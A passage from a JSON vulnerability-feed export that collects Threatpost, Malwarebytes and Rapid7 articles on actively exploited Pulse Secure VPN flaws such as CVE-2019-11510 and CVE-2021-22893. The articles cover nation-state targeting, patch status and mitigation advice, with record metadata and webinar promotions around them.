here_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_ for the Wed., April 21 LIVE event. _**\n", "modified": "2021-04-16T18:10:09", "published": "2021-04-16T18:10:09", "id": "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "href": "https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/", "type": "threatpost", "title": "NSA: 5 Security Bugs Under Active Nation-State Cyberattack", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-05-04T17:56:13", "bulletinFamily": "info", "cvelist": ["CVE-2019-11510", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900"], "description": "Pulse Secure has [rushed a fix](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/SA44784/>) for a critical zero-day security vulnerability in its Connect Secure VPN devices, which has been exploited by nation-state actors to launch cyberattacks against U.S. defense, finance and government targets, as well as victims in Europe.\n\nPulse Secure also patched three other security bugs, two of them also critical RCE vulnerabilities.\n\n[](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nThe zero-day flaw, tracked as CVE-2021-22893, was first disclosed on April 20 and carries the highest possible CVSS severity score, 10 out of 10. An exploit allows remote code-execution (RCE) and two-factor authentication bypass. The bug [is being used in the wild](<https://threatpost.com/pulse-secure-critical-zero-day-active-exploit/165523/>) to gain administrator-level access to the appliances, according to research from Pulse Secure\u2019s parent company, Ivanti.\n\nIt\u2019s related to multiple use-after-free problems in Pulse Connect Secure before version 9.1R11.4, according to the advisory issued Tuesday, and \u201callows a remote unauthenticated attacker to execute arbitrary code via license server web services.\u201d It can be exploited without any user interaction.\n\nThe activity level has been such that the Cybersecurity and Infrastructure Security Agency (CISA) [issued an alert](<https://cyber.dhs.gov/ed/21-03/>) warning businesses of the ongoing campaigns. These are [being tracked by FireEye Mandiant](<https://threatpost.com/pulse-secure-critical-zero-day-active-exploit/165523/>) as being carried out by two main advanced persistent threat (APT) clusters with links to China: UNC2630 and UNC2717.\n\nIn addition to the exploit for CVE-2021-22893, the campaigns involve 12 different malware families overall, Mandiant said. The malware is used for authentication-bypass and establishing backdoor access to the VPN devices, and for lateral movement.\n\n\u201cNation-state hackers will forever pose a threat to businesses around the world,\u201d Andrey Yesyev, director of cybersecurity at Accedian, said via email. \u201cThese types of attacks are almost impossible to detect and are increasingly dangerous for any organization\u2019s sensitive data. Once hackers gain initial access to a victim\u2019s network, they\u2019ll move laterally in order to find valuable data. Furthermore, if they\u2019re able to infiltrate an organization\u2019s perimeter, bad actors could establish a connection to a command-and-control server (C2) \u2013 allowing them to control compromised systems and steal data from target networks.\u201d\n\n## **Additional Critical Pulse Connect VPN RCE Bugs**\n\nPulse Secure also rolled out fixes for three other concerning issues. Threatpost has reached out to Pulse Secure to find out whether these bugs are also being actively exploited in the wild.\n\nThe other patches are:\n\n * **CVE-2021-22894 (CVSS rating of 9.9)**: A buffer overflow in Pulse Connect Secure Collaboration Suite before 9.1R11.4 allows remote authenticated users to execute arbitrary code as the root user via maliciously crafted meeting room.\n * **CVE-2021-22899 (CVSS rating of 9.9):** A command-injection bug in Pulse Connect Secure before 9.1R11.4 allows remote authenticated users to perform RCE via Windows File Resource Profiles.\n * **CVE-2021-22900 (CVSS rating of 7.2):** Multiple unrestricted uploads in Pulse Connect Secure before 9.1R11.4 allow an authenticated administrator to perform a file write via a maliciously crafted archive upload in the administrator web interface.\n\n## **Pulse Secure: A Cyberattacker\u2019s Favorite**\n\nPulse Secure appliances have been in the sights of APTs for months, with ongoing nation-state attacks using the bug tracked as CVE-2019-11510. It allows unauthenticated remote attackers to send a specially crafted URI to carry out arbitrary file-reading \u2013 perfect for espionage efforts.\n\nHere\u2019s a rundown of recent activity:\n\n * **April:** [The FBI warned](<https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/>) that a known arbitrary file-read Pulse Secure bug (CVE-2019-11510) was part of five vulnerabilities under attack by the Russia-linked group known as APT29 (a.k.a. Cozy Bear or The Dukes). APT29 is conducting \u201cwidespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access,\u201d according to the Feds.\n * **April**: The Department of Homeland Security (DHS) urged companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, because in many cases, attackers have already exploited CVE-2019-11510 to hoover up victims\u2019 credentials \u2013 and now are using those credentials to move laterally through organizations, [DHS warned](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>).\n * **October**: CISA said that a federal agency had suffered a successful espionage-related cyberattack that led to a backdoor and multistage malware being dropped on its network. Once again, [CVE-2019-11510 was in play](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>), used to gain access to employees\u2019 legitimate Microsoft Office 365 log-in credentials and sign into an agency computer remotely.\n\nTo stay safe, Accedian\u2019s Yesyev suggested monitoring east-west traffic to detect these types of intrusions.\n\n\u201cAnd in order to detect C2 communications, it\u2019s important to have visibility into network communication patterns,\u201d he added. \u201cThis is yet another instance that proves the benefits of a layered security model. In addition to adopting network-based threat detection and user/endpoint behavior analytics solutions, security must be designed into the DevOps cycle. These technologies and processes help organizations understand communication patterns and destinations to help identify C2 tunnels\u2026allowing teams to identify stealthy lateral movements and ultimately protect data from being stolen.\u201d\n\n**Join Threatpost for \u201c**[**Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**\u201d \u2013 a LIVE roundtable event on**[** Wed, May 12 at 2:00 PM EDT**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinarhttps://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**. Sponsored by Zoho ManageEngine, Threatpost host Becky Bracken moderates an expert panel discussing best defense strategies for these 2021 threats. Questions and LIVE audience participation encouraged. Join the lively discussion and [Register HERE](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>) for free. **\n", "modified": "2021-05-04T17:42:30", "published": "2021-05-04T17:42:30", "id": "THREATPOST:18D24326B561A78A05ACB7E8EE54F396", "href": "https://threatpost.com/pulse-secure-vpns-fix-critical-zero-day-bugs/165850/", "type": "threatpost", "title": "Pulse Secure VPNs Get a Fix for Critical Zero-Day Bugs", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-10T12:11:12", "bulletinFamily": "info", "cvelist": ["CVE-2018-13379", "CVE-2018-13382", "CVE-2018-13383", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1579"], "description": "State-sponsored advanced persistent threat (APT) groups are using flaws in outdated VPN technologies from Palo Alto Networks, Fortinet and Pulse Secure to carry out cyber attacks on targets in the United States and overseas, warned U.S. and U.K. officials.\n\nThe National Security Agency (NSA) issued a [Cybersecurity Advisory](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>) Monday about the threats and offered mitigation suggestions, warning that multiple APT actors have weaponized three critical vulnerabilities first published in August\u2013[CVE-2019-11539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11539>), [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>) and [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)\u2013to gain access to vulnerable VPN devices. The first two affect Pulse Secure VPNs while the third affects Fortinet technology.\n\nThe National Cyber Security Centre in the United Kingdom posted [a separate warning](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>) about the threats, which stem from vulnerabilities that allow \u201can attacker to retrieve arbitrary files, including those containing authentication credentials,\u201d according to the post.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe flaws allow an attacker to use those stolen credentials to connect to the VPN and change configuration settings or even connect to other infrastructure on the network, authorities warned. Through this unauthorized connection, an attacker could gain privileges to run secondary exploits that could allow them to access a root shell.\n\nThe U.K.\u2019s alert added two more Fortinet vulnerabilities to the list\u2013[CVE-2018-13382](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13382>) and [CVE-2018-13383](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13383>)\u2014as well as a Palo Alto Networks VPN flaw, [CVE-2019-1579](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1579>).\n\nAuthorities offered a series of mitigation techniques for the vulnerabilities, which they said should be taken very seriously by users of these products.\n\nTo mitigate attacks against all of the existing threats, officials recommend a couple of basic steps: apply any existing patches for VPNs in use that could be at risk, and update existing credentials. The NSA also recommended revoking existing VPN server keys and certificates and generating new ones.\n\nA more comprehensive list of mitigation techniques recommended by the NSA also includes discouraging the use of proprietary SSLVPN/TLSVPN protocols and self-signed and wild card certificates for public-facing VPN web applications; requiring mutual certificate-based authentication so remote clients attempting to access the public-facing VPN web application must present valid client certificates to maintain a connection; and using multi-factor authentication to prevent attackers from authenticating with compromised passwords by requiring a second authentication factor.\n\nNeither the NSA nor the National Cyber Security Centre alerts identified which groups are responsible for the attacks.\n\nThe warnings come after [reports surfaced](<https://www.zdnet.com/article/a-chinese-apt-is-now-going-after-pulse-secure-and-fortinet-vpn-servers/>) last month that APT5 was targeting VPNs from Fortinet and Pulse Secure after code for two of the aforementioned vulnerabilities was disclosed in a presentation at the Black Hat Security Conference (The two companies have patched those flaws, and in the case of Pulse Secure, issued the fixes in April, three months before Black Hat.).\n\nAPT5, a Chinese state-sponsored group also known as Manganese, has been active since 2007 with a particular focus on technology and telecommunications companies, according to a [report](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-southeast-asia-threat-landscape.pdf>) by FireEye.\n\n**_What are the top cyber security issues associated with privileged account access and credential governance? Experts from Thycotic will discuss during our upcoming free _**[**_Threatpost webinar_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_, \u201cHackers and Security Pros: Where They Agree & Disagree When It Comes to Your Privileged Access Security.\u201d _**[**_Click here to register_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_._**\n", "modified": "2019-10-08T12:44:16", "published": "2019-10-08T12:44:16", "id": "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "href": "https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/", "type": "threatpost", "title": "APT Groups Exploiting Flaws in Unpatched VPNs, Officials Warn", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2019-10-18T17:31:38", "bulletinFamily": "blog", "cvelist": ["CVE-2019-11510"], "description": "In April 2019, Pulse Secure published an advisory about a vulnerability in their software. In August, cybercriminals were massively scanning for systems that were running a vulnerable version. Now it\u2019s October, and still many organizations have not applied the patches that are available for this vulnerability. \n\nThis is a trend we've seen repeated with dozens of other publicly-known vulnerabilities and organizations that are slow to update software to the latest, most secure versions. \n\nWith so many organizations falling victim to cyberattack via exploited vulnerability, we have to ask: Why aren't people patching?\n\n### What are the vulnerabilities?\n\nReading the above, you might suspect that the vulnerabilities were not serious or hard to exploit. But that's not the impression we get from the Pulse Secure advisory. It states:\n\n> \u201cMultiple vulnerabilities were discovered and have been resolved in Pulse Connect Secure (PCS) and Pulse Policy Secure (PPS). This includes an authentication by-pass vulnerability that can allow an unauthenticated user to perform a remote arbitrary file access on the Pulse Connect Secure gateway. This advisory also includes a remote code execution vulnerability that can allow an authenticated administrator to perform remote code execution on Pulse Connect Secure and Pulse Policy Secure gateways.\u201d\n\nPulse Connect Secure is a VPN solution for organizations and offers remote users a secure connection to the corporate network so they can remotely log in and work. Pulse Policy Secure is a well-known Network Access Control solution, which does not only control who can connect but also assigns the appropriate permissions.\n\nWhen it comes to software like this, an authentication by-pass vulnerability is a serious problem. Any criminal with the proper knowledge can pretend to be an employee and access company resources. In this case, https access and the use of an especially-prepared URL would be enough to read an arbitrary file on a vulnerable system.\n\nNeedless to say, that is a serious problem\u2014and we haven\u2019t even touched on the remote code execution possibility. Every hacker's dream is to be able to run their code on your system. That gives them a foothold within your network from which they can expand their activities. They can plant ransomware or whatever else they fancy.\n\n### Where would they get the necessary knowledge\n\nBy design, many cybercriminals are opportunistic, and they will jump at any easy copy-and-paste job that renders enough cash. So, when the vulnerability was discussed elaborately at Black Hat in early August, the method to exploit the vulnerability became general knowledge. \n\nSince using this method hardly requires expert knowledge, researchers soon noticed a lot of scanning activity by cybercriminals looking for vulnerable systems. The vulnerability in Pulse Secure was presented along with a [few vulnerabilities in other SSL VPN products](<https://www.blackhat.com/us-19/briefings/schedule/#infiltrating-corporate-intranet-like-nsa---pre-auth-rce-on-leading-ssl-vpns-15545>). Shortly after, an exploit for this vulnerability was published on GitHub, so every copycat could have it handy.\n\n### Unpatched\n\nOn Saturday, August 24, 2019, scans performed by [Bad Packets](<https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/>) found a total of 14,528 Pulse Secure VPN endpoints vulnerable to CVE-2019-11510. Over 5,000 of those were in the US, including military, federal, state, and local government agencies. \n\nA week later, 10,471 Pulse Secure VPN servers worldwide remained vulnerable to compromise. On Monday, September 16, 2019, there were still 7,712 left to be patched. On Monday, October 7, 2019, a surprising 6,018 remained, with a lot of active scanning going on\u2014and this was after advisories have been issued by the NSA and the NCSC.\n\n### Responsibility\n\nA basic question in cases like these is: Who is responsible for applying patches? Without doubt, we expect a vendor to develop a patch as soon as the vulnerability is made known to them, but what happens after that? \n\nIndustry leaders have long warned that vulnerability remediation and effective patch management are essential to keep organizations safe from cyberattacks. But there are a few essential steps in the delivery chain after the patch is released:\n\n * Customers need to be made aware of the patch and the required urgency.\n * Security providers or resellers need to make sure their customers are aware of the existence of the patch and the possible consequences of not applying it.\n * Organizations need to have a department or external provider that is responsible for keeping the security software updated. Spending money on top-notch software and then leaving it unattended is a sure waste of money. Keeping software in shape is not limited to applying patches, but security patches can sometimes be more important than fetching the latest rules update.\n\nThe natural next question, then, is why aren't organizations applying patches as soon as they know about them? \n\n* * *\n\n_Recommended reading: _[Tackling the shortage in skilled IT staff: whole team security](<https://blog.malwarebytes.com/security-world/business-security-world/2019/02/tackling-the-shortage-in-skilled-it-staff-whole-team-security/>)\n\n* * *\n\n### So, what\u2019s stopping them from applying the patch?\n\nAssuming that an organization's IT or security team is aware of the patch, possible reasons for holding off might be fear of disrupted processes or a possible disagreement on what they might regard as critical. But the possible consequences of an unpatched critical vulnerability should heavily outweigh those concerns. \n\nThere could be several other reasons for not applying patches as soon as they are available:\n\n * Understaffed IT and security teams \n * Looking into the consequences first, which could slow down the process due to lack of feedback\n * Waiting for others to share their experiences before applying patches \n * Unaware of the patch's existence, sometimes as a result of not having time to follow up on emails and warning signs\n * Lack of a point of contact. Whose problem is it? And whose job is to solve it?\n\nAs you can see, most of these can be traced back to a lack of staff and time, and sometimes funding is responsible for those two shortages. But sometimes understaffing is because of [other reasons.](<https://blog.malwarebytes.com/security-world/2018/06/whats-causing-the-cybersecurity-skills-gap/>) And once you are understaffed, the lack of time to follow up on problems comes as a logical consequence.\n\n### The Pulse vulnerability is not alone\n\nIt\u2019s not like the Pulse vulnerability is the only VPN-related vulnerability out there (or any software vulnerability, for that matter). Similar problems are known to exist in products from Fortinet and Palo Alto. \n\nIn an [advisory](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>) from the National Cyber Security Center (NCSC) in the UK, users of the affected VPN products can find specified log entries to look for signs of a compromise or attempt to compromise. They also emphasize the need for patching: \n\n> \u201cSecurity patches should always be applied promptly. More guidance is available on the NCSC website. The NCSC acknowledges that patching is not always straightforward and in some cases can cause business disruption, but it remains the single most important step an organisation or individual can take to protect itself.\u201d\n\nSo, the question remains: If organizations are aware of the patch and have the staff resources to apply it, why are so many dragging their feet? Maybe some of our readers can shed some light on this mystery. Feel free to share your personal experiences in the comments. \n\nThe post [Pulse VPN patched their vulnerability, but businesses are trailing behind](<https://blog.malwarebytes.com/business-2/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2019-10-18T16:36:36", "published": "2019-10-18T16:36:36", "id": "MALWAREBYTES:5B32671B820EEB03840B798BCEA9FDC8", "href": "https://blog.malwarebytes.com/business-2/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind/", "type": "malwarebytes", "title": "Pulse VPN patched their vulnerability, but businesses are trailing behind", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-04T12:27:56", "bulletinFamily": "blog", "cvelist": ["CVE-2019-11510", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-22893"], "description": "Pulse Secure has [alerted customers](<https://blog.pulsesecure.net/pulse-connect-secure-security-update/>) to the existence of an exploitable chain of attack against its Pulse Connect Secure (PCS) appliances. PCS provides Virtual Private Network (VPN) facilities to businesses, which use them to prevent unauthorized access to their networks and services.\n\nCybersecurity sleuths Mandiant report that they are tracking "12 malware families associated with the exploitation of Pulse Secure VPN devices" operated by groups using a set of related techniques to bypass both single and multi-factor authentication. Most of the problems discovered by Pulse Secure and Mandiant involve three vulnerabilities that were patched in 2019 and 2020. But there is also a very serious new issue that it says impacts a very limited number of customers.\n\n### The old vulnerabilities\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The patched vulnerabilities are listed as:\n\n * [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability. We [wrote](<https://blog.malwarebytes.com/business-2/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind/>) about the apparent reluctance to patch for this vulnerability in 2019.\n * [CVE-2020-8243](<https://nvd.nist.gov/vuln/detail/CVE-2020-8243>) a vulnerability in the Pulse Connect Secure < 9.1R8.2 admin web interface could allow an authenticated attacker to upload a custom template to perform an arbitrary code execution.\n * [CVE-2020-8260](<https://nvd.nist.gov/vuln/detail/CVE-2020-8260>) a vulnerability in the Pulse Connect Secure < 9.1R9 admin web interface could allow an authenticated attacker to perform an arbitrary code execution using uncontrolled gzip extraction.\n\nThe obvious advice here is to review the Pulse advisories for these vulnerabilities and follow the recommended guidance, which includes changing all passwords in the environments that are impacted.\n\n### The new vulnerability\n\nThe new vulnerability (CVE-2021-22893) is a Remote Code Execution (RCE) vulnerability with a CVSS score of 10\u2014the maximum\u2014and a Critical rating. According to [the Pulse advisory](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784>):\n\n> [The vulnerability] includes an authentication by-pass vulnerability that can allow an unauthenticated user to perform remote arbitrary file execution on the Pulse Connect Secure gateway. This vulnerability has a critical CVSS score and poses a significant risk to your deployment.\n\nThere is no patch for it yet (it is expected to be patched in early May), so system administrators will need to mitigate for the problem for now, rather than simply fixing it. Please don't wait for the patch.\n\n### Mitigation requires a workaround\n\nAccording to Pulse Secure, until the patch is available CVE-2021-22893 can be mitigated by importing a workaround file. More details can be found in the company's [Security Advisory 44784](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784>). Reportedly, the workaround disables Pulse Collaboration, a feature that allows users to schedule and hold online meetings between both Connect Secure users and non-Connect Secure users. The workaround also disables the Windows File Share Browser that allows users to browse network file shares.\n\n### Targets\n\nThe Pulse Connect Secure vulnerabilities including CVE-2021-22893 have been used to target government, defense and financial organizations around the world, but mainly in the US. According to some articles the threat-actors are linked to China. The identified threat actors were found to be harvesting account credentials. Very likely in order to perform lateral movement within compromised organizations' environments. They have also observed threat actors deploying modified Pulse Connect Secure files and scripts in order to maintain persistence. These modified scripts on the Pulse Secure system are reported to have allowed the malware to survive software updates and factory resets.\n\n### Threat analysis\n\nFireEye's Mandiant was involved in the research into these vulnerabilities. It has posted an elaborate analysis of the related malware, which they have dubbed SlowPulse. According to Mandiant, the malware and its variants are "applied as modifications to legitimate Pulse Secure files to bypass or log credentials in the authentication flows that exist within the legitimate Pulse Secure shared object libdsplibs.so". In their [blogpost](<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>) they discuss 4 variants. Interested parties can also find technical details and detections there.\n\n### Networking devices\n\nState sponsored cyber-attacks are often more about espionage than about monetary gain with the exception of sabotage against an enemy state. A big part of the espionage is getting hold of login credentials of those that have access to interesting secret information. Breaking into network devices in a way that can be used to extract login credential is an important strategy in this secret conflict. Keep in mind that attribution is always hard and tricky. You may end up reaching the conclusion they wanted you to reach. Given the targets and the methodology however, it makes sense in this case to look first at state sponsored threat actors.\n\n### Update May 4th\n\nThe Pulse Secure team released a security update to address the issue outlined in [Security Advisory SA44784 (CVE-2021-22893)](<https://kb.pulsesecure.net/pkb_mobile#article/l:en_US/SA44784/s>) impacting the Pulse Connect Secure appliance. It is recommend that customers act urgently to apply the update to ensure they are protected. On that note, Pulse Secure also recommends that customers use the Pulse Security Integrity Checker Tool, a tool for customers to identify malicious activity on their systems, and that they continue to apply and follow recommended guidance for all available security patches.\n\nThe post [Take action! Multiple Pulse Secure VPN vulnerabilities exploited in the wild](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/take-action-multiple-pulse-secure-vpn-vulnerabilities-exploited-in-the-wild/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2021-04-21T18:12:15", "published": "2021-04-21T18:12:15", "id": "MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C", "href": "https://blog.malwarebytes.com/malwarebytes-news/2021/04/take-action-multiple-pulse-secure-vpn-vulnerabilities-exploited-in-the-wild/", "type": "malwarebytes", "title": "Take action! Multiple Pulse Secure VPN vulnerabilities exploited in the wild", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-16T16:30:59", "bulletinFamily": "blog", "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "description": "The National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have jointly released a Cybersecurity Advisory called [Russian SVR Targets U.S. and Allied Networks](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>), to expose ongoing Russian Foreign Intelligence Service (SVR) exploitation of five publicly known vulnerabilities. The advisories' executive summary reads:\n\n> Russian Foreign Intelligence Service (SVR) actors, who are also known under the names APT29, Cozy Bear, and The Dukes frequently use publicly known vulnerabilities to conduct widespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials and use those to gain further access. This targeting and exploitation encompasses US and allied networks, including national security and government related systems.\n\n### Remarkable mentions in the cybersecurity advisory\n\nReleased alongside the advisory is the US Government\u2019s formal attribution of the [SolarWinds](<https://blog.malwarebytes.com/threat-analysis/2020/12/advanced-cyber-attack-hits-private-and-public-sector-via-supply-chain-software-update/>) supply chain compromise, and the cyber espionage campaign related to it, to Russia.\n\nMentioned are recent SVR activities that include targeting COVID-19 research facilities via [WellMess malware](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c>) and targeting networks through a VMware vulnerability disclosed by NSA.\n\n### Vulnerabilities\n\nNSA, CISA, and the FBI are encouraging organizations to check their networks for Indicators of Compromise (IOCs) related to five vulnerabilities.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\nThe advisory lists the following CVEs:\n\n * [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) as discussed here: [Fortinet FortiGate VPN](<https://www.fortiguard.com/psirt/FG-IR-18-384>)\n * [CVE-2019-9670](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9670>) as discussed here: [Synacor Zimbra Collaboration Suite](<https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories>)\n * [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>) as discussed here: [Pulse Secure Pulse Connect Secure VPN](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)\n * [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>) as discussed here: [Citrix Application Delivery Controller and Gateway](<https://support.citrix.com/article/CTX267027>)\n * [CVE-2020-4006](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4006>) as discussed here: [VMware Workspace ONE Access](<https://www.vmware.com/security/advisories/VMSA-2020-0027.html>)\n\nWe have added a link to the vendor\u2019s sites where they discuss the vulnerabilities and where you can find how to patch them. As you can see most of those are quite old (the first four digits in a CVE ID are the year in which the CVE was issued) and patches have been available for a considerable time.\n\n### General mitigation strategy\n\nWhile some vulnerabilities have specific additional mitigations that you can read about in the items linked in the list above, the advisory hands us the following general mitigations:\n\n * Keep systems and products updated and patch as soon as possible after patches are released since many actors exploit numerous vulnerabilities.\n * Expect that the risk from data stolen or modified (including credentials, accounts, and software) before a device was patched will not be alleviated by patching or simple remediation actions. Assume that a breach will happen, enforce least-privileged access, and make password changes and account reviews a regular practice.\n * Disable external management capabilities and set up an out-of-band management network.\n * Block obsolete or unused protocols at the network edge and disable them in device configurations.\n * Isolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce exposure of the internal network.\n * Enable robust logging of Internet-facing services and authentication functions. Continuously hunt for signs of compromise or credential misuse, particularly within cloud environments.\n * Adopt a mindset that compromise happens; prepare for incident response activities, only communicate about breaches on out-of-band channels, and take care to uncover a breach\u2019s full scope before remediating.\n\n### Techniques\n\nThe techniques leveraged by SVR actors include:\n\n * **Exploiting public-facing applications**. Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior.\n * **Leveraging external remote services**. Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms (notably RPD) allow users to connect to internal enterprise network resources from external locations.\n * **Compromising supply chains**. Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n * **Using valid accounts**. Adversaries may obtain and abuse credentials of existing accounts as a means of gaining access or elevating permissions.\n * **Exploiting software for credential access**. Adversaries may exploit software vulnerabilities in an attempt to collect credentials.\n * **Forging web credentials**: SAML tokens. An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.\n\nThe items listed under mitigations and techniques probably won't be new to many of the people reading this, but they are a reminder that security, even against nation-state actors, is often a matter of getting some important but mundane things right, over and over again.\n\nStay safe, everyone!\n\nThe post [Patch now! NSA, CISA, and FBI warn of Russian intelligence exploiting 5 vulnerabilities](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2021-04-16T14:59:38", "published": "2021-04-16T14:59:38", "id": "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "href": "https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/", "type": "malwarebytes", "title": "Patch now! NSA, CISA, and FBI warn of Russian intelligence exploiting 5 vulnerabilities", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-04-21T20:51:08", "bulletinFamily": "info", "cvelist": ["CVE-2019-11510", "CVE-2019-11539", "CVE-2021-22893"], "description": "\n\nOn Tuesday, April 20, 2021, security firm FireEye [published detailed analysis](<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>) of multiple threat campaigns targeting Ivanti\u2019s Pulse Connect Secure VPN. According to FireEye\u2019s analysis, threat actors have been leveraging multiple techniques to bypass single- and multi-factor authentication on Pulse Secure VPN devices, establish persistence across updates, and maintain access via webshells. The focus of the analysis is on threats to U.S. defense networks, but Pulse Secure devices are also a [perennially popular target for exploitation](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>) across a broad range of organizations\u2019 networks.\n\nWhile some of the intrusions FireEye is tracking were attributed to exploitation of older Pulse Secure vulnerabilities, threat actors have evidently also been using [CVE-2021-22893](<https://attackerkb.com/topics/PqQGYGwWdM/cve-2021-22893>), a previously unknown zero-day vulnerability, in combination with older vulns to harvest credentials, move laterally within target environments, and persist using legitimate but modified Pulse Secure binaries and scripts on VPN appliances. For full findings of FireEye\u2019s investigation, including an extensive list of IOCs and ATT&CK techniques, we highly 